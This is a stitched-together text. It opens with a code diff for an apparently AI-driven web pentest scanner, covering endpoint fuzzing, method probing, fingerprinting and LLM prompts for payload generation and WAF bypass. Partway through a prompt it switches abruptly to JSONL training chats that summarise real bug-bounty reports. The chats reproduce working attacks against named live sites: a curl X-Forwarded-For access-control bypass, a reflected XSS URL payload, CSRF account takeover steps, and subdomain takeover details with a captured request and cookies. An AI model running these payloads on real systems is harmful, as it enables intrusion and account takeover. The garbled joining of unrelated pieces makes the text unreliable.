"payments", "invoices", "customers", + "dashboard", "reports", "analytics", "logs", "events", + "webhooks", "tokens", "sessions", "roles", "permissions", + "config", "health", "status", "version", "docs", + ] + + # Common REST sub-patterns + CRUD_SUFFIXES = [ + "", "/1", "/me", "/all", "/list", "/search", + "/count", "/export", "/import", "/bulk", + ] + + for base in api_bases: + # Try common resources under each API base + for resource in COMMON_RESOURCES: + if resource not in api_resources: + inferred.add(f"{target_origin}{base}/{resource}") + # Try CRUD variants for known resources + for resource in api_resources: + for suffix in CRUD_SUFFIXES: + inferred.add(f"{target_origin}{base}/{resource}{suffix}") + + # Remove already-known endpoints + known_normalized = {_normalize_url(ep) for ep in known_endpoints} + inferred = {url for url in inferred if _normalize_url(url) not in known_normalized} + + # Batch check (parallel, capped) + to_check = sorted(inferred)[:100] + check_tasks = [self._check_url_alive(url) for url in to_check] + results = await asyncio.gather(*check_tasks, return_exceptions=True) + + discovered = [] + for url, alive in zip(to_check, results): + if alive is True: + discovered.append(EndpointInfo( + url=url, method="GET", source="api_fuzzing", priority=6, + )) + + logger.info(f"[DeepRecon] API fuzzing: {len(discovered)}/{len(to_check)} alive") + return discovered + + # ------------------------------------------------------------------ + # Multi-method discovery + # ------------------------------------------------------------------ + + async def discover_methods( + self, target: str, endpoints: List[str], sample_size: int = 20 + ) -> Dict[str, List[str]]: + """Test which HTTP methods each endpoint accepts (OPTIONS + probing).""" + results: Dict[str, List[str]] = {} + sampled = endpoints[:sample_size] + + async def _check_options(url: str) -> Tuple[str, List[str]]: + try: + session = await self._get_session() + async with session.options( + url, 
ssl=False, timeout=aiohttp.ClientTimeout(total=5) + ) as resp: + allow = resp.headers.get("Allow", "") + if allow: + return url, [m.strip().upper() for m in allow.split(",")] + # Also check Access-Control-Allow-Methods + cors = resp.headers.get("Access-Control-Allow-Methods", "") + if cors: + return url, [m.strip().upper() for m in cors.split(",")] + except Exception: + pass + return url, [] + + tasks = [_check_options(url) for url in sampled] + responses = await asyncio.gather(*tasks, return_exceptions=True) + + for resp in responses: + if isinstance(resp, tuple): + url, methods = resp + if methods: + results[url] = methods + + return results + # ------------------------------------------------------------------ # Deep technology fingerprinting # ------------------------------------------------------------------ _FINGERPRINT_FILES = [ "/readme.txt", "/README.md", "/CHANGELOG.md", "/CHANGES.txt", - "/package.json", "/composer.json", + "/package.json", "/composer.json", "/Gemfile.lock", + "/requirements.txt", "/go.mod", "/pom.xml", "/build.gradle", ] _WP_PROBES = [ @@ -349,6 +856,18 @@ class DeepRecon: _add(name, ver, path) except (json.JSONDecodeError, ValueError): pass + elif path == "/go.mod": + m = re.search(r'^module\s+(\S+)', content, re.MULTILINE) + if m: + _add(m.group(1), "go-module", path) + for dep_m in re.finditer(r'^\s+(\S+)\s+(v[\d.]+)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) + elif path == "/requirements.txt": + for dep_m in re.finditer(r'^([a-zA-Z0-9_\-]+)==([\d.]+)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) + elif path == "/Gemfile.lock": + for dep_m in re.finditer(r'^\s{4}([a-z_\-]+)\s+\(([\d.]+)\)', content, re.MULTILINE): + _add(dep_m.group(1), dep_m.group(2), path) else: m = self.RE_VERSION.search(content) if m: @@ -375,3 +894,84 @@ class DeepRecon: _add("Drupal", m.group(1), dp_path) return results + + # ------------------------------------------------------------------ + # Comprehensive 
recon pipeline + # ------------------------------------------------------------------ + + async def full_recon( + self, target: str, technologies: List[str], + js_urls: List[str], known_endpoints: List[str], + ) -> Dict: + """Run ALL recon phases and return aggregated results.""" + results: Dict = { + "sitemap_urls": [], + "robots_paths": [], + "js_analysis": None, + "api_schema": None, + "framework_endpoints": [], + "fuzzed_endpoints": [], + "method_map": {}, + "fingerprints": [], + "all_endpoints": [], + } + + # Run independent phases in parallel + sitemap_task = self.parse_sitemap(target) + robots_task = self.parse_robots(target) + js_task = self.crawl_js_files(target, js_urls) if js_urls else asyncio.sleep(0) + api_task = self.enumerate_api(target, technologies) + fw_task = self.discover_framework_endpoints(target, technologies) + + sitemap_result, robots_result, js_result, api_result, fw_result = \ + await asyncio.gather(sitemap_task, robots_task, js_task, api_task, fw_task, + return_exceptions=True) + + if isinstance(sitemap_result, list): + results["sitemap_urls"] = sitemap_result + if isinstance(robots_result, tuple): + results["robots_paths"] = robots_result[0] + if isinstance(js_result, JSAnalysisResult): + results["js_analysis"] = js_result + if isinstance(api_result, APISchema): + results["api_schema"] = api_result + if isinstance(fw_result, list): + results["framework_endpoints"] = fw_result + + # Aggregate all discovered endpoints + all_eps = set(known_endpoints) + all_eps.update(results["sitemap_urls"]) + all_eps.update(results["robots_paths"]) + if results["js_analysis"]: + all_eps.update(results["js_analysis"].endpoints) + if results["api_schema"]: + for ep in results["api_schema"].endpoints: + url = ep.get("url", "") + if url.startswith("/"): + all_eps.add(urljoin(target, url)) + elif url.startswith("http"): + all_eps.add(url) + for fw_ep in results["framework_endpoints"]: + all_eps.add(fw_ep.url) + + # Now run API fuzzing with ALL known endpoints 
+ try: + fuzzed = await self.fuzz_api_patterns(target, sorted(all_eps)) + if isinstance(fuzzed, list): + results["fuzzed_endpoints"] = fuzzed + for ep in fuzzed: + all_eps.add(ep.url) + except Exception as e: + logger.warning(f"[DeepRecon] API fuzzing error: {e}") + + # Discover methods for a sample + try: + methods = await self.discover_methods(target, sorted(all_eps)) + results["method_map"] = methods + except Exception as e: + logger.warning(f"[DeepRecon] Method discovery error: {e}") + + results["all_endpoints"] = sorted(all_eps)[:MAX_ENDPOINTS] + logger.info(f"[DeepRecon] Total endpoints discovered: {len(results['all_endpoints'])}") + + return results diff --git a/backend/core/vuln_engine/ai_prompts.py b/backend/core/vuln_engine/ai_prompts.py index 4ba5b9b..978c0f0 100755 --- a/backend/core/vuln_engine/ai_prompts.py +++ b/backend/core/vuln_engine/ai_prompts.py @@ -1624,3 +1624,476 @@ VULN_AI_PROMPTS: Dict[str, dict] = { "technology_hints": {"general": "OWASP API Security #3. Check: REST APIs without field selection, GraphQL without proper field-level authorization, response serializers including all model fields."} }, } + + +# --------------------------------------------------------------------------- +# Deep Test Prompts — AI-driven iterative testing loop +# --------------------------------------------------------------------------- + +def get_deep_test_plan_prompt( + vuln_type: str, + context: str, + playbook_ctx: str = "", + iteration: int = 1, + previous_results: str = "", +) -> str: + """Build the PLANNING prompt for _ai_deep_test() Step 2. + + The LLM receives full context about the endpoint and must generate + specific, targeted test cases — not generic payloads. 
+ + Args: + vuln_type: The vulnerability type being tested (e.g., "sqli_error") + context: Rich context string (endpoint, baseline, tech, WAF, params) + playbook_ctx: Playbook methodology context for this vuln type + iteration: Current iteration number (1-3) + previous_results: JSON string of previous test results (for iterations 2+) + """ + # Get per-type proof requirements + proof_req = "" + try: + from backend.core.vuln_engine.system_prompts import VULN_TYPE_PROOF_REQUIREMENTS + proof_req = VULN_TYPE_PROOF_REQUIREMENTS.get(vuln_type, "") + except ImportError: + pass + + # Get per-type AI prompt for detection strategy + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + detection = type_prompt.get("detection_strategy", "") + methodology = type_prompt.get("test_methodology", "") + payload_hints = type_prompt.get("payload_selection", "") + + iteration_context = "" + if iteration > 1 and previous_results: + iteration_context = f""" +## PREVIOUS TEST RESULTS (Round {iteration - 1}) +You have already tested this endpoint. Here are the ACTUAL server responses: + +{previous_results} + +IMPORTANT: Analyze what happened. What did the server do with your input? +- Did any payload cause an error? → Exploit that error pattern. +- Did any payload get reflected? → Check encoding, try context escape. +- Did any payload change the response? → Investigate what changed and why. +- Did all payloads get blocked? → Try encoding/obfuscation bypass. +- Did the server behave identically for all inputs? → Endpoint likely NOT vulnerable. + +Generate NEW test cases that build on what you learned. Do NOT repeat previous payloads. +""" + + return f"""You are an expert penetration tester performing Round {iteration} of iterative {vuln_type.upper()} testing. 
+ +## TARGET CONTEXT +{context} + +{f"## DETECTION STRATEGY" + chr(10) + detection if detection else ""} +{f"## METHODOLOGY" + chr(10) + methodology if methodology else ""} +{f"## PAYLOAD HINTS" + chr(10) + payload_hints if payload_hints else ""} +{playbook_ctx} +{f"## PROOF REQUIREMENTS" + chr(10) + proof_req if proof_req else ""} +{iteration_context} + +## YOUR TASK +Generate {3 if iteration == 1 else 5} specific test cases for {vuln_type} on this endpoint. +Each test must be a concrete HTTP request — not a description of what to test. + +Respond ONLY with JSON: +{{ + "reasoning": "Brief explanation of your testing strategy based on the context", + "tests": [ + {{ + "name": "Descriptive name of the test", + "rationale": "Why this specific test based on what you observed", + "method": "GET|POST|PUT|DELETE", + "url": "Full URL to test (use actual URLs from context)", + "params": {{"param_name": "payload_value"}}, + "headers": {{"Header-Name": "value"}}, + "body": "request body if POST/PUT (or empty string)", + "content_type": "application/x-www-form-urlencoded|application/json|text/xml", + "injection_point": "parameter|header|body|path", + "success_indicators": ["what to look for in response that proves vulnerability"], + "failure_indicators": ["what indicates NOT vulnerable"] + }} + ] +}} + +RULES: +- Use ACTUAL URLs and parameters from the context — don't invent endpoints. +- Each test MUST have a clear rationale tied to the target's behavior. +- Include both aggressive tests (exploit attempts) and subtle probes (behavior mapping). +- If this is Round 2+, your tests MUST be adapted based on previous results.""" + + +def get_deep_test_analysis_prompt( + vuln_type: str, + test_results: str, + baseline: str = "", + iteration: int = 1, +) -> str: + """Build the ANALYSIS prompt for _ai_deep_test() Step 4. + + The LLM receives actual HTTP responses and must analyze them + for vulnerability indicators with anti-hallucination enforcement. 
+ + Args: + vuln_type: The vulnerability type being tested + test_results: JSON string of test results with actual HTTP responses + baseline: Baseline response data for comparison + iteration: Current iteration number + """ + # Get per-type proof requirements + proof_req = "" + try: + from backend.core.vuln_engine.system_prompts import VULN_TYPE_PROOF_REQUIREMENTS + proof_req = VULN_TYPE_PROOF_REQUIREMENTS.get(vuln_type, "") + except ImportError: + pass + + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + verification = type_prompt.get("verification_criteria", "") + fp_indicators = type_prompt.get("false_positive_indicators", "") + + return f"""Analyze these HTTP responses for {vuln_type.upper()} vulnerability. +This is Round {iteration} of iterative testing. + +## BASELINE RESPONSE (normal behavior without attack payload) +{baseline if baseline else "Not available — compare between test responses instead."} + +## TEST RESULTS (actual server responses) +{test_results} + +{f"## VERIFICATION CRITERIA" + chr(10) + verification if verification else ""} +{f"## KNOWN FALSE POSITIVE PATTERNS" + chr(10) + fp_indicators if fp_indicators else ""} +{f"## PROOF REQUIREMENTS" + chr(10) + proof_req if proof_req else ""} + +## ANALYSIS INSTRUCTIONS + +For EACH test result, analyze: +1. Did the response differ from baseline? How exactly? (status, body, headers, timing) +2. Is the difference CAUSED by the payload, or is it generic application behavior? +3. Does the response contain proof of execution (not just delivery)? +4. Would you stake your professional reputation on this finding? + +ANTI-HALLUCINATION CHECK: +- ONLY cite evidence that appears in the ACTUAL response data above. +- Do NOT infer, assume, or speculate about what "might" happen. +- If the evidence is ambiguous, it is NOT confirmed. 
+ +Respond ONLY with JSON: +{{ + "analysis": [ + {{ + "test_name": "Name of the test analyzed", + "is_vulnerable": true|false, + "confidence": "high|medium|low", + "evidence": "EXACT string/pattern from the actual response that proves it", + "reasoning": "Why this specific evidence proves (or disproves) the vulnerability" + }} + ], + "overall_vulnerable": true|false, + "continue_testing": true|false, + "next_round_strategy": "What to try next if continue_testing is true (or 'done' if false)", + "summary": "One-line summary of findings" +}} + +CRITICAL: Set "continue_testing": true ONLY if you observed promising signals that +warrant deeper investigation. If all tests show no vulnerability indicators, set false.""" + + +# --------------------------------------------------------------------------- +# Pre-Stream Master Planning Prompt — AI context before parallel streams +# --------------------------------------------------------------------------- + +def get_master_plan_prompt( + target: str, + initial_response: str = "", + technologies: str = "", + endpoints_preview: str = "", + forms_preview: str = "", + waf_info: str = "", + playbook_context: str = "", +) -> str: + """Build the master planning prompt executed BEFORE the 3 parallel streams. + + This gives the AI full initial context and asks it to produce a strategic + test plan that all 3 streams can reference for context-aware testing. + """ + return f"""You are a senior penetration tester planning a comprehensive security assessment. 
+ +## TARGET +URL: {target} + +## INITIAL RECONNAISSANCE +{f"### Response Headers & Body Fingerprint" + chr(10) + initial_response if initial_response else "Initial probe not yet available."} + +{f"### Technologies Detected" + chr(10) + technologies if technologies else "Not yet detected."} + +{f"### Endpoints Discovered" + chr(10) + endpoints_preview if endpoints_preview else "No endpoints discovered yet."} + +{f"### Forms Found" + chr(10) + forms_preview if forms_preview else "No forms found yet."} + +{f"### WAF Detection" + chr(10) + waf_info if waf_info else "No WAF detected."} + +{playbook_context} + +## YOUR TASK +Create a MASTER TEST PLAN for this target. This plan will guide 3 parallel testing streams: +1. **Recon Stream** — what to look for during deeper reconnaissance +2. **Testing Stream** — which vulnerability types to prioritize and why +3. **Tool Stream** — which security tools would be most effective + +Analyze the target's technology stack, response patterns, and attack surface to produce: + +Respond ONLY with JSON: +{{ + "target_profile": "Brief description of what this application appears to be", + "technology_assessment": "Key technologies and their security implications", + "attack_surface_summary": "Primary attack vectors based on initial recon", + "priority_vuln_types": ["ordered list of 10-15 vuln types most likely to succeed"], + "high_value_endpoints": ["endpoints that deserve the most attention"], + "recon_guidance": {{ + "focus_areas": ["what the recon stream should specifically look for"], + "hidden_surface_hints": ["directories, API patterns, or configs to probe"] + }}, + "testing_strategy": {{ + "immediate_tests": ["vuln types to test RIGHT NOW on the main URL"], + "tech_specific_tests": ["tests specific to the detected technology stack"], + "bypass_strategies": ["WAF bypass or encoding strategies if WAF detected"] + }}, + "tool_recommendations": {{ + "priority_tools": ["tools to run first and why"], + "tool_arguments": ["specific 
flags or wordlists for this target"] + }}, + "risk_assessment": "Overall risk level and what makes this target interesting" +}} + +RULES: +- Base your analysis on ACTUAL data from the initial probe — don't speculate. +- Prioritize vuln types by LIKELIHOOD of success on THIS specific target. +- Consider the technology stack when recommending tests (e.g., Java → deserialization, PHP → LFI). +- If WAF is detected, factor bypass strategies into every recommendation.""" + + +# --------------------------------------------------------------------------- +# Junior Stream AI Payload Generation Prompt +# --------------------------------------------------------------------------- + +def get_junior_ai_test_prompt( + url: str, + vuln_type: str, + params: list, + method: str = "GET", + tech_context: str = "", + master_plan_context: str = "", + waf_info: str = "", +) -> str: + """Build prompt for AI-generated payloads in Stream 2 junior testing. + + Instead of hardcoded 3 payloads, the AI generates context-aware payloads + tailored to the specific endpoint, parameters, and technology stack. + """ + # Get per-type detection strategy + type_prompt = VULN_AI_PROMPTS.get(vuln_type, {}) + detection = type_prompt.get("detection_strategy", "") + payload_hints = type_prompt.get("payload_selection", "") + + params_str = ", ".join(params[:5]) if params else "unknown" + + return f"""You are a penetration tester performing quick, targeted {vuln_type.upper()} testing. + +## TARGET +URL: {url} +Method: {method} +Parameters: {params_str} +{f"Technologies: {tech_context}" if tech_context else ""} +{f"WAF: {waf_info}" if waf_info else ""} +{f"Master Plan Context: {master_plan_context}" if master_plan_context else ""} + +{f"## DETECTION STRATEGY" + chr(10) + detection if detection else ""} +{f"## PAYLOAD HINTS" + chr(10) + payload_hints if payload_hints else ""} + +## YOUR TASK +Generate 3-5 targeted {vuln_type} payloads for this specific endpoint. 
+Each payload must be crafted for the actual parameters and technology stack. + +Respond ONLY with JSON: +{{ + "reasoning": "Brief strategy for testing this endpoint", + "tests": [ + {{ + "param": "parameter name to inject into", + "payload": "the actual payload string", + "method": "GET|POST", + "injection_point": "parameter|header|body", + "header_name": "header name if injection_point is header", + "success_indicator": "what to look for in response" + }} + ] +}} + +RULES: +- Use ACTUAL parameter names from the target. +- Tailor payloads to the technology stack (don't send PHP payloads to Java apps). +- If WAF is detected, use encoding/obfuscation in payloads. +- Include at least one probe payload (behavior mapping) and one exploit payload. +- Keep it fast — max 5 payloads.""" + + +# --------------------------------------------------------------------------- +# Tool Output AI Analysis Prompt +# --------------------------------------------------------------------------- + +def get_tool_analysis_prompt( + tool_name: str, + tool_output: str, + target: str, + existing_findings_summary: str = "", +) -> str: + """Build prompt for AI analysis of security tool output in Stream 3. + + Instead of just ingesting raw tool findings, the AI analyzes the output + to identify real vulnerabilities, filter noise, and suggest follow-up tests. + """ + return f"""You are a senior penetration tester analyzing output from the security tool "{tool_name}". + +## TARGET +{target} + +## TOOL OUTPUT (raw stdout/stderr) +``` +{tool_output[:4000]} +``` + +{f"## EXISTING FINDINGS (already confirmed)" + chr(10) + existing_findings_summary if existing_findings_summary else ""} + +## YOUR TASK +Analyze this tool output with expert judgment: + +1. **True Findings**: Identify REAL vulnerabilities from the output (not informational noise) +2. **False Positives**: Flag findings that are likely false positives and explain why +3. 
**Follow-Up Tests**: Suggest manual tests to confirm ambiguous findings +4. **Hidden Insights**: What does this output reveal about the target that isn't obvious? + +Respond ONLY with JSON: +{{ + "real_findings": [ + {{ + "title": "Finding title", + "severity": "critical|high|medium|low|info", + "vulnerability_type": "vuln_type_name", + "endpoint": "affected URL", + "evidence": "exact evidence from tool output", + "confidence": "high|medium|low", + "reasoning": "why this is a real finding" + }} + ], + "false_positives": [ + {{ + "title": "What the tool flagged", + "reason": "why it's a false positive" + }} + ], + "follow_up_tests": [ + {{ + "test": "what to test manually", + "vuln_type": "vuln_type_name", + "endpoint": "URL to test", + "rationale": "why this follow-up is needed" + }} + ], + "target_insights": "What this tool output reveals about the target's security posture" +}} + +RULES: +- Only mark findings as "real" if the tool output contains concrete evidence. +- Default scanner informational items (server headers, allowed methods) are NOT vulnerabilities. +- Consider existing findings — don't flag duplicates. +- Focus on ACTIONABLE output, not noise.""" + + +# --------------------------------------------------------------------------- +# Recon AI Endpoint Analysis Prompt +# --------------------------------------------------------------------------- + +def get_recon_analysis_prompt( + target: str, + endpoints: str, + forms: str = "", + technologies: str = "", + parameters: str = "", + js_files: str = "", + api_endpoints: str = "", +) -> str: + """Build prompt for AI analysis of recon results in Stream 1. + + After endpoint discovery, AI analyzes the full attack surface to + prioritize endpoints and identify hidden attack vectors. + """ + return f"""You are a penetration tester analyzing reconnaissance results. 
+ +## TARGET +{target} + +## DISCOVERED ENDPOINTS +{endpoints} + +{f"## FORMS" + chr(10) + forms if forms else ""} +{f"## TECHNOLOGIES" + chr(10) + technologies if technologies else ""} +{f"## PARAMETERS" + chr(10) + parameters if parameters else ""} +{f"## JAVASCRIPT FILES" + chr(10) + js_files if js_files else ""} +{f"## API ENDPOINTS" + chr(10) + api_endpoints if api_endpoints else ""} + +## YOUR TASK +Analyze this reconnaissance data as a penetration tester would: + +1. **Endpoint Prioritization**: Rank endpoints by attack potential +2. **Hidden Surface**: Identify probable hidden endpoints or patterns +3. **Parameter Analysis**: Flag high-risk parameters based on naming conventions +4. **Technology Vulnerabilities**: Map technologies to known vulnerability classes +5. **Attack Chains**: Identify potential multi-step attack paths + +Respond ONLY with JSON: +{{ + "high_priority_endpoints": [ + {{ + "url": "endpoint URL", + "risk_score": 1-10, + "reason": "why this endpoint is high priority", + "suggested_vuln_types": ["vuln types to test"] + }} + ], + "hidden_endpoints_to_probe": [ + {{ + "url": "URL pattern to try", + "rationale": "why this might exist" + }} + ], + "high_risk_parameters": [ + {{ + "param": "parameter name", + "endpoint": "where found", + "risk_type": "what kind of injection it's susceptible to", + "priority": "high|medium|low" + }} + ], + "tech_vuln_mapping": [ + {{ + "technology": "tech name", + "vuln_types": ["relevant vuln types"], + "specific_tests": ["targeted test recommendations"] + }} + ], + "attack_chains": [ + {{ + "chain": "Step 1 → Step 2 → Impact", + "starting_point": "where to begin" + }} + ], + "additional_recon_suggestions": ["What else to look for"] +}} + +RULES: +- Base ALL analysis on the actual data provided — don't invent endpoints. +- Prioritize by LIKELIHOOD of exploitation, not theoretical severity. +- Consider technology-specific vulnerabilities (e.g., Spring → actuator, WordPress → wp-admin). 
+- Flag parameters like 'url', 'file', 'path', 'redirect', 'callback', 'template' as high-risk.""" diff --git a/backend/core/vuln_engine/system_prompts.py b/backend/core/vuln_engine/system_prompts.py index 9c4e028..6412969 100755 --- a/backend/core/vuln_engine/system_prompts.py +++ b/backend/core/vuln_engine/system_prompts.py @@ -268,6 +268,41 @@ belongs to another user or represents privileged information. When in doubt, do three-way comparison: (1) your data, (2) target ID as you, (3) target ID as target user.""" +PROMPT_ITERATIVE_TESTING = """## ITERATIVE TESTING (OBSERVE → ADAPT → EXPLOIT) + +You are testing ITERATIVELY. Each round, you see the actual server responses from your +previous tests. Use this feedback to refine your attack. + +OBSERVE → HYPOTHESIZE → TEST → ANALYZE → ADAPT: + +1. OBSERVE: Study the response carefully — status code, headers, body content, timing. + What does the server actually DO with your input? + +2. HYPOTHESIZE: Based on observed behavior, form a specific hypothesis: + - "Parameter reflects input unencoded → likely XSS" + - "Single quote causes 500 → backend SQL parsing fails → try error-based SQLi" + - "Different response for id=1 vs id=2 → possible IDOR" + - "Response includes external URL content → SSRF confirmed, try internal targets" + +3. TEST: Design your next test to confirm or deny the hypothesis. + Target the SPECIFIC behavior you observed — don't spray generic payloads. + +4. ANALYZE: Did the hypothesis hold? What new information did you learn? + - Error message leaked DB type → now try DB-specific injection syntax + - WAF blocked \n\n
\n\n \n\n \n\n
\n\n \n\n\n```\n3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content .\n\n/!\\ You can't add a same filtered content this will generate a 400 HTTP Response code /!\\\n\nYou can follow me in the video POC.\n\nThanks, good bye.\n\n### Impacto\nAllow a attacker add filtered content to a target/victim account."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: X-Forward-For Header allows to bypass access restrictions"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nIf the \"X-Forward-For: 127.0.0.1\" header is used, it allows to bypass restrictions of the web application and access endpoints that are restricted otherwise. This allows for example to access the \"Business Owner App backend API\". 
The responding server thinks, he is accessed by an internal IP.\n\n### Passos para Reproduzir\nPOC1:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/status \n\n{\"error\": {\"id\": \"PredicateMismatch\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/status -H \"X-Forwarded-For: 127.0.0.1\"\n\n{\"host\": \"biz--app-main--useast1-74dd77b89b-fgtdk\", \"health\": {}, \"mem_vsz\": 1111.61328125, \"mem_rss\": 410.0, \"pid\": 91941, \"uptime\": 178784.86051034927, \"version\": null}\n```\n\nPOC2:\n```\n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json \n{\"error\": {\"id\": \"HTTPNotFound\"}}% \n➜ /tmp curl -k https://biz-app.yelp.com/swagger.json -H \"X-Forwarded-For: 127.0.0.1\" \n█████\n█████\n███████\n█████████\n████\n███\n████\n██████\n█████████ \n██████████ [...]\n```\n\nThe responding server thinks, it is accessed by an internal IP as can be seen in the headers:\n```\nHTTP/1.1 200 OK\nConnection: close\nserver: openresty/1.13.6.2\ncontent-type: application/json\nx-b3-sampled: 0\nx-is-internal-ip-address: true\nx-zipkin-id: 2fce61c10ade1e32\nx-routing-service: routing-main--useast1-d84b86b87-cwstn; site=biz_app\nx-mode: ro\nx-proxied: 10-65-64-83-useast1aprod\nx-extlb: 10-65-64-83-useast1aprod\nAccept-Ranges: bytes\nDate: Mon, 19 Oct 2020 12:21:19 GMT\nVia: 1.1 varnish\nX-Served-By: cache-hhn4033-HHN\nX-Cache: MISS\nX-Cache-Hits: 0\nContent-Length: 573093\n```\n\n### Impacto\nAs the attacker is seen as having an internal IP he is able to access resources which should otherwise be restricted for him."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true via PATH"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Navigate to https://www.glassdoor.co.in/FAQ/Microsoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n 2. input the payload inside path.\n\n 3.Open this url: https://www.glassdoor.co.in/FAQ/Mic%22%3e%3cimg%20onerro%3d%3e%3cimg%20src%3dx%20onerror%3dalert%601%60%3e\nrosoft-Question-FAQ200086-E1651.htm?countryRedirect=true\n\n An alert will be popped up.\n\n### Impacto\nUsing XSS an attacker can steals the victim cookie and can also redirect him to a malicious site controlled by the attacker."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CSRF to account takeover in https://█████/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThere is no protection against CSRF in changing email which lead to CSRF to account takeover on https://██████/.\n\n### Impacto\nIt is a critical issue as i was able to takeover anyone account using this attack. This vulnerability is high/critical because I was able to perform account takeover"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. 
Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe Subdomains https://register.acronis.com, https://promo.acronis.com, https://info.acronis.com and https://promosandbox.acronis.com \nare vulnerable to takeover due to unclaimed marketo CNAME records. Anyone is able to own these subdomains at the moment.\n\nThis vulnerability is called subdomain takeover. You can read more about it here:\n\n https://blog.sweepatic.com/subdomain-takeover-principles/\n https://hackerone.com/reports/32825\n https://hackerone.com/reports/779442\t\n https://hackerone.com/reports/175070\n\n### Passos para Reproduzir\n```\nnslookup register.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses:104.17.74.206\n 104.17.72.206\n 104.17.70.206\n 104.17.73.206\n 104.17.71.206\nAliases: register.acronis.com\n acronis.mktoweb.com\n\nnslookup promo.acronis.com\nNon-authoritative answer:\nName: sjh.mktossl.com\nAddresses: 104.17.71.206\n 104.17.70.206\n 104.17.74.206\n 104.17.72.206\n 104.17.73.206\nAliases: promo.acronis.com\n acronis.mktoweb.com\n\n```\n\nCNAMES entries to corresponding domains are as:\n```\npromo.acronis.com acronis.mktoweb.com\npromosandbox.acronis.com acronissandbox2.mktoweb.com\nregister.acronis.com acronis.mktoweb.com\ninfo.acronis.com \t mkto-h0084.com\n```\n\nAs register.acronis.com and promo.acronis.com pointing to CNAME record as acronis.mktoweb.com and are aliases to acronis.mktoweb.com . 
http://acronis.mktoweb.com/ is giving 404, page not found with message \"The requested URL was not found on this server\" which can be claimed by anyone now and would result in subdomain takeover.\n\nThe marketo document to Customize Your Landing Page URLs with a CNAME\nhttps://docs.marketo.com/display/public/DOCS/Customize+Your+Landing+Page+URLs+with+a+CNAME\n\n**As marketo is a paid service and offers account for marketing automation, I don't have a registered account. \nI wrote to Marketo technical support team and they claim the availability of listed domains as the listed domains are not in use or configured anymore.**\n\n### Impacto\nWith this, I can clearly see XSS impact in your case. Please have a look at your /v2/account request intercepted below:\nRequest:\n```\nPUT /v2/account HTTP/1.1\nHost: account.acronis.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=utf-8\nContent-Length: 702\nOrigin: https://register.acronis.com\nConnection: close\nReferer: https://account.acronis.com/\nCookie: _gcl_au=1.1.36144172.1601449011; _ga=GA1.2.1290766356.1601449012; _fbp=fb.1.1601449012432.633797135; _hjid=a7dd36be-ea53-40b1-b04e-c2a96f5ebc3c; optimizelyEndUserId=oeu1601449014822r0.42778295429069313; OptanonConsent=isIABGlobal=false&datestamp=Mon+Oct+26+2020+16%3A35%3A28+GMT%2B0530+(India+Standard+Time)&version=6.6.0&hosts=&consentId=07081eac-3ae3-443d-8451-79f5327d9351&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0004%3A1%2CC0003%3A1%2CC0002%3A1&AwaitingReconsent=false&geolocation=IN%3BHR; _mkto_trk=id:929-HVV-335&token:_mch-acronis.com-1601449020651-40834; OptanonAlertBoxClosed=2020-10-26T11:05:28.204Z; visid_incap_1638029=Bol4fqOiQTKxMXB55rfSHvSPlF8AAAAAQUIPAAAAAACe+MbhqMW1sJI4dpZBH6DI; _hjTLDTest=1; 
